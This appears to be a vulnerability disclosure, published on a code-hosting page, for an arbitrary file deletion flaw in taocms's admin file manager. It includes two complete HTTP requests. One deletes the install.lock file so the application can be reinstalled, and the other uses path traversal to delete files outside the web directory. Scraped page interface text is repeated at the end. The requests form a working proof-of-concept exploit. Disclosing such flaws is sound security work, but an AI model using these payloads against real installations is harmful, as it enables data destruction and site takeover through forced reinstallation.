taocms arbitrary file deletion vulnerability

attack condition: Requires login management

open taocms/include/Model/File.php, found delete file code. The requested url is admin.php?action=file&ctrl=del&path=, receive parameter path.

When taocms is installed, the install.lock file will be generated in the data directory

At this point, when I visit install.php, it reminds me that it is already installed

As requested below, I want to delete the install.lock file

GET /admin/admin.php?action=file&ctrl=del&path=/data/install.lock HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1:9999/admin/admin.php?action=file&ctrl=lists
Cookie: PHPSESSID=tnbrlgg1g539t0mjovqs1vrgio
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Surprisingly it can be removed successfully

I visit install.php again, glad, taocms allows reinstallation

Also, create a new test.txt file in your own user directory

When I execute delete payload，test.txt is deleted

GET /admin/admin.php?action=file&ctrl=del&path=/../../../test.txt HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1:9999/admin/admin.php?action=file&ctrl=lists
Cookie: PHPSESSID=tnbrlgg1g539t0mjovqs1vrgio
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

taocms-arbitrary-file-deletion-vulnerability.md

taocms-arbitrary-file-deletion-vulnerability.md

taocms arbitrary file deletion vulnerability

attack condition: Requires login management

Files

taocms-arbitrary-file-deletion-vulnerability.md

Latest commit

History

taocms-arbitrary-file-deletion-vulnerability.md

File metadata and controls

taocms arbitrary file deletion vulnerability

attack condition: Requires login management